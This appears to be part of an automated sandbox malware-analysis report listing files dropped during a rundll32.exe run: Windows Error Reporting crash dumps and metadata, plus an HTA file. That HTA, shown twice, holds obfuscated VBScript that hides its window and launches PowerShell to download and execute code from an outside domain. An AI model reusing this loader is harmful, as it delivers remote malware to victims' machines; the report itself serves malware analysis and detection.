                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.8.8.2.1.1.5.4.8.8.4.0.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.8.8.2.1.1.6.0.8.2.1.4.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.a.5.3.9.9.a.-.1.b.6.9.-.4.c.7.a.-.8.d.8.c.-.7.1.6.1.e.e.1.3.a.e.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.3.f.e.8.7.c.-.8.0.d.5.-.4.3.4.1.-.9.8.e.5.-.d.b.e.f.5.9.a.8.1.7.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.6.4...A.g.e.n.t...H.H.B...g.e.n...E.l.d.o.r.a.d.o...1.3.3.1.3...2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.b.8.-.0.0.0.1.-.0.0.1.4.-.1.d.9.2.-.8.4.d.3.8.3.a.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.

                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_93561547f9ab75e2d2d7d784e3e2763e56fb4_ea019e54_6fc4d428-48e4-4399-bb71-eef6d35e2dc1\Report.wer

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.8306283207831321
                      Encrypted:false
                      SSDEEP:192:FGBixy6Qjd0sZ6heBjJuzuiFRZ24lO8S1:8Bi01jeswheBjgzuiFRY4lO8S
                      MD5:C027670DB444A078E34089EAB049E9D9
                      SHA1:5BBE824731D6D3402D52EEE8C3BE694A5951F5EF
                      SHA-256:605DFB5CFAEC0E64B459C373C0F3FE04FA1E40324FC32E53D3165CB26E7656CC
                      SHA-512:6D190AB5A7D2673271CEB3E100709D19745CF07F3B369001B3E7D459A8609838D6F2F8609846CA3884B112697A94C2826F38D082B3DEB7592913B8AB435878B9
                      Malicious:false
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.8.8.2.1.2.1.5.1.0.2.8.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.8.8.2.1.2.2.4.3.2.1.2.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.c.4.d.4.2.8.-.4.8.e.4.-.4.3.9.9.-.b.b.7.1.-.e.e.f.6.d.3.5.e.2.d.c.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.2.5.6.e.b.d.-.f.8.0.5.-.4.6.1.8.-.b.3.9.b.-.7.4.b.7.1.1.d.4.7.2.2.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.6.4...A.g.e.n.t...H.H.B...g.e.n...E.l.d.o.r.a.d.o...1.3.3.1.3...2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.b.0.-.0.0.0.1.-.0.0.1.4.-.8.4.6.3.-.2.0.d.7.8.3.a.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.

                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_93561547f9ab75e2d2d7d784e3e2763e56fb4_ea019e54_aac994ee-ce0b-48fb-8a74-40af1f4af919\Report.wer

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.8334925541314742
                      Encrypted:false
                      SSDEEP:192:iBEivyxjd0sZ6heBjxuzuiFRZ24lO8S1:jiqxjeswheBjYzuiFRY4lO8S
                      MD5:DD9EC9C3F2448FA23BA34120858ED2E3
                      SHA1:A4A33F7449EC939F2E808673ABA9E671976FDB92
                      SHA-256:9EA903E3D31C54C48630D56481EBDB41E186E432DE127F9911EC30DCE5977CB3
                      SHA-512:FC68FB377A5A9A02B3D66181AF1231AC5BB6A348536F0DA47CAE39DA9E42D9CA4BA8862EEE80D717783C6A2B2C16C2E655450FEEC0F508AEA4082C6D853B9B36
                      Malicious:false
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.8.8.2.1.1.5.4.8.8.3.0.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.8.8.2.1.1.6.0.8.2.0.4.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.c.9.9.4.e.e.-.c.e.0.b.-.4.8.f.b.-.8.a.7.4.-.4.0.a.f.1.f.4.a.f.9.1.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.6.6.3.7.9.6.-.8.d.8.7.-.4.a.8.4.-.8.d.4.9.-.a.2.e.2.f.6.7.1.0.9.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.6.4...A.g.e.n.t...H.H.B...g.e.n...E.l.d.o.r.a.d.o...1.3.3.1.3...2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.c.c.-.0.0.0.1.-.0.0.1.4.-.e.c.2.6.-.8.3.d.3.8.3.a.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9897.tmp.dmp

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Mini DuMP crash report, 14 streams, Wed May 22 20:08:35 2024, 0x1205a4 type
                      Category:dropped
                      Size (bytes):60004
                      Entropy (8bit):1.6112156913142135
                      Encrypted:false
                      SSDEEP:192:V0HBlOMUUgGxWdiU9nU+4fON7h4UIAU0Q:qShQYr2vO74L
                      MD5:2427C661BD7B1E47F7A12DF5E019AAF0
                      SHA1:6573F26B424F51237F144489EBAD80F5646D74A7
                      SHA-256:500F7E7417A341E228BDFA3BF6FFDEEB47AD4EBCEEB2CE6403D9F8126B6E9D44
                      SHA-512:F1ED8A10E26DAEE7CE2FCE8167D3156CFC312A3FDC6D2C258E7254F6467FDDD196DD6CA810C3A264C30DC9BF38337336274BB1248DF1F33EDDB0533B1B3AB8BA
                      Malicious:false
                      Preview:MDMP..a..... ........PNf........................h...............",..........T.......8...........T.......................................................................................................................eJ..............Lw......................T............PNf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9915.tmp.dmp

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Mini DuMP crash report, 14 streams, Wed May 22 20:08:35 2024, 0x1205a4 type
                      Category:dropped
                      Size (bytes):58544
                      Entropy (8bit):1.6458848669131927
                      Encrypted:false
                      SSDEEP:96:5o8B1GFkG2nZvMUYFTEnD3I5oi7MJ4/DDX5faQXQNZpzlrGWBM8YuhKq8lqieCaH:VrCBFWOMJ4H5iQXQ3zPXixueZ/wYI
                      MD5:1725BAFBC5EAFFA2D90F6941277408EB
                      SHA1:AED7A9D3B991E530AF18215157561C5A9DBD5769
                      SHA-256:06E7B2BFA170255C16AC9D278A6594D90C9651C4BDB86C3D49B9B9CAA4748215
                      SHA-512:8EB6369CAC4799F1B8A3611F6D038855AE13461EF68D6BB7AB82B23FD32CCB18EF290A59EAF882A03D649CAE2CE369BBB9973BEDE7EA7E9B41F30BCA4B100D01
                      Malicious:false
                      Preview:MDMP..a..... ........PNf........................h...............",..........T.......8...........T.......................................................................................................................eJ..............Lw......................T............PNf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9925.tmp.WERInternalMetadata.xml

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):9008
                      Entropy (8bit):3.7016076207464987
                      Encrypted:false
                      SSDEEP:192:R6l7wVeJVOqX6YtDNgmfv/cDfprr89bvsLf0fFm:R6lXJ8E6Y5Ngmfv/rvofp
                      MD5:BD76FF90808B9578CC5F0915AAAA69A0
                      SHA1:55619B08DB8B6F2A81493187D63FC385706D272A
                      SHA-256:A4C5CD1F032E0252E6F0D78B8A94E01C2F6E6276B76ADCEC61248C8B2C86E03F
                      SHA-512:8C2BAABFDA1420240098A227F36B69AA34C28D9FDB86E9DB1E55CBE29692F88FFA4E2D1364FDB9165AB88D38DAA241ACFD4DCA3844C80EB2ABE03821984D1767
                      Malicious:false
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.3.6.<./.P.i.

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER99A3.tmp.xml

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5074
                      Entropy (8bit):4.55501088791989
                      Encrypted:false
                      SSDEEP:48:cvIwWl8zsoYJg771I9CVWpW8VYRYm8M4JC9maa9moWmFaHFmyq8vh9moWmFaHZpW:uIjfJI7hk7VRJRa5QBWCQ0ZpoO6d
                      MD5:ADF4267F38FFFF245AA913CE1EE23F85
                      SHA1:BBAC9831D4D6F547087AB01AD54F89F06ACF893E
                      SHA-256:04514CB7C7083573592CDC3BE911CD1091BDEBF8E4701C06247C55C79B8E7FB9
                      SHA-512:F9B2F09E69FB3C4D047D946324EEFD28B0AB5263D387DAA190FDD8B438F408A04890B7ED26C6B845EF1F65DA0C30C5E3A6C2A882BD5CB73AB920AC2B2DD04A64
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="334751" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER99B2.tmp.WERInternalMetadata.xml

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):9016
                      Entropy (8bit):3.701105437837095
                      Encrypted:false
                      SSDEEP:192:R6l7wVeJfhiOn6YoXhigmfv/cDfprOx89bvnLfhFm:R6lXJJ16Y4Ugmfv/2vLfa
                      MD5:998AD4A1F3964ECC0A48A63935CEAA3D
                      SHA1:D106C886A3E1BECE61DC9BBCBA5D4CCEDC5EF6EC
                      SHA-256:E8E3DB51EC6C234D1CA287B4557B9CA4999526DBEFAC3B637330DEE98CFACEDD
                      SHA-512:C660ABE555A7D96ECF70BEBF698205D3B02DDD7FD65D46D2459DEDBF5B3BDEE581BE0794CEBCA8998957A688CDAABC10EDEF9C6E512C8601110A83A4BAD39287
                      Malicious:false
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.2.4.<./.P.i.

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A02.tmp.xml

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5074
                      Entropy (8bit):4.555834050596137
                      Encrypted:false
                      SSDEEP:48:cvIwWl8zsoYJg771I9CVWpW8VYAYm8M4JC9maa9moWmFaHFbyq8vh9moWmFanptN:uIjfJI7hk7VsJRa5QwWCQqpoO3d
                      MD5:A0EC428FB19912355D07FEB17CE60194
                      SHA1:70835B6680A875D883F788660AFAE8E20D7F36DE
                      SHA-256:67AF5B6D2EFF6498C492B6AE3CC14D1E7A39F1BFFB838E01C7673FBEF8F7102D
                      SHA-512:0A1F992BAA050091620476A9F6B03EBC9938C38450ED186FBDD917EE474D7A55F94AA0A8B240339588C0A6F32C6F8858C3C8DADF786F913A86D42E188C5AA28B
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="334751" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB036.tmp.dmp

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Mini DuMP crash report, 14 streams, Wed May 22 20:08:41 2024, 0x1205a4 type
                      Category:dropped
                      Size (bytes):57700
                      Entropy (8bit):1.663800017404353
                      Encrypted:false
                      SSDEEP:96:5m8B1eQFkG2nZvMUYFTEHDYZIoi7MH2saMI9CVPXfvPo0ooVxAs5VpItVRoKWIi8:rBxB11OMHXaZCVPPvQ0/AsIEs1Rz
                      MD5:313C2D0F486B29CAA20198D2F946F8BD
                      SHA1:B7AD2B5EE78207BD5BAF014EF6E3A716F470EC84
                      SHA-256:3C2279F6E7B79476877CE586F2BEF4929F9ECF6BE00F71FC6A1AFFA38D1924B4
                      SHA-512:3CEC043A525A62DBFB749CEBBB1ABA1427654BD10FB29727DCAB5962F2BCBB2724D8CF69DAD9BE7791856F6A785022B864343CAE9E549C975FFB047E7B5270A1
                      Malicious:false
                      Preview:MDMP..a..... ........PNf........................h...............",..........T.......8...........T.......................................................................................................................eJ..............Lw......................T............PNf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB22B.tmp.WERInternalMetadata.xml

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8942
                      Entropy (8bit):3.6986840309495213
                      Encrypted:false
                      SSDEEP:192:R6l7wVeJMv/X6Y2MKgmfv/cDfprB89bH+kffRtm:R6lXJEf6Y1Kgmfv/ZHlffS
                      MD5:B61FF371320D3EC0A22991CDBB265C5B
                      SHA1:ACF1F4C55589AA50F29AF9A200298409DB093838
                      SHA-256:3ECC516CB43DC213CEDDCCF31B7DDB8F2FF714C104101FAA7F430A39F329B4BB
                      SHA-512:1032A326A3F62B0B7C57EB78DAF7E7E16D9A695763CF6150D854FCB07097A967BB71D55AD8C580BC0F6AB31EE013DA2E4D64EF120F402A9E7CC19A32855F3BAE
                      Malicious:false
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.0.0.<./.P.i.

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB27A.tmp.xml

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5073
                      Entropy (8bit):4.555354935901548
                      Encrypted:false
                      SSDEEP:48:cvIwWl8zsoYJg771I9CVWpW8VYJYm8M4JC9maa9moWmFaHFpyq8vh9moWmFai7mM:uIjfJI7hk7VxJRa5QGWCQApoO2d
                      MD5:0220DAA89AD025FA3C51688A30356772
                      SHA1:5077F079F24930370338C067A4CC98DE885392F2
                      SHA-256:C21CE27CB68C07A23594B0DB3D38DE3578FC8322CC72AF43F2FA488A75281783
                      SHA-512:99D6C7640CA659FD88FB42645484167B0C58D202BDEB54FEA7B5AF862ED48D30578CF2B2D06B2FEB5BA816CBB38A27E0913C9473B5D7986EA57253FBBB0A9F95
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="334751" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                      C:\Users\Public\example.hta

                      Download File
                      Process:C:\Windows\System32\rundll32.exe
                      File Type:HTML document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2331
                      Entropy (8bit):2.2639624275996346
                      Encrypted:false
                      SSDEEP:24:1Ax2kGtrIVP5Db8mF7QdVTMs4CV4no3h25B:1uqlyFaTHukh25B
                      MD5:F754844CFB65838D1DD6B19DDE5D835C
                      SHA1:B3EB677783ADC88C8D048898449E04D49F416DB6
                      SHA-256:3644B387519F3509A1CE3D2201E2E1E8AF36217138CC6F9E62D6E37C887097A6
                      SHA-512:F42F89562B5C0BE86DBD04683EE6C30711155ACD1239E273DA726C2BFEDF5D0806C479B7107792C136BFF6E97EFB8D9145DF0C176F499F86F1B7E304A2E3CCDF
                      Malicious:false
                      Preview:<head>..................................... <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> .. <script type="text/vbscript"> .. Sub Window_OnLoad ....uzctjeus = replace("-CFeoFemFemFeaFenFedFe IFenFevFeoFekFee-EFexpFereFessFeiFeoFenFe Fe(iFerm -UrFei 'iapartmentlistings.com/tykhwuxk')","Fe","") ..hqsumejb = replace("FeSFehFeeFelFelFe.FeAFepFepFelFeiFecFeaFetFeiFeoFenFe","Fe","") ..foucukcj = replace("FepFeoFewFeeFerFesFehFeeFelFel","Fe","") ..CreateObject(hqsumejb).ShellExecute foucukcj, uzctjeus ,"","",0

                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].txt

                      Download File
                      Process:C:\Windows\System32\rundll32.exe
                      File Type:HTML document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2331
                      Entropy (8bit):2.2639624275996346
                      Encrypted:false
                      SSDEEP:24:1Ax2kGtrIVP5Db8mF7QdVTMs4CV4no3h25B:1uqlyFaTHukh25B
                      MD5:F754844CFB65838D1DD6B19DDE5D835C
                      SHA1:B3EB677783ADC88C8D048898449E04D49F416DB6
                      SHA-256:3644B387519F3509A1CE3D2201E2E1E8AF36217138CC6F9E62D6E37C887097A6
                      SHA-512:F42F89562B5C0BE86DBD04683EE6C30711155ACD1239E273DA726C2BFEDF5D0806C479B7107792C136BFF6E97EFB8D9145DF0C176F499F86F1B7E304A2E3CCDF
                      Malicious:false
                      Preview:<head>..................................... <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> .. <script type="text/vbscript"> .. Sub Window_OnLoad ....uzctjeus = replace("-CFeoFemFemFeaFenFedFe IFenFevFeoFekFee-EFexpFereFessFeiFeoFenFe Fe(iFerm -UrFei 'iapartmentlistings.com/tykhwuxk')","Fe","") ..hqsumejb = replace("FeSFehFeeFelFelFe.FeAFepFepFelFeiFecFeaFetFeiFeoFenFe","Fe","") ..foucukcj = replace("FepFeoFewFeeFerFesFehFeeFelFel","Fe","") ..CreateObject(hqsumejb).ShellExecute foucukcj, uzctjeus ,"","",0

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):5829
                      Entropy (8bit):4.901113710259376
                      Encrypted:false
                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                      Malicious:false
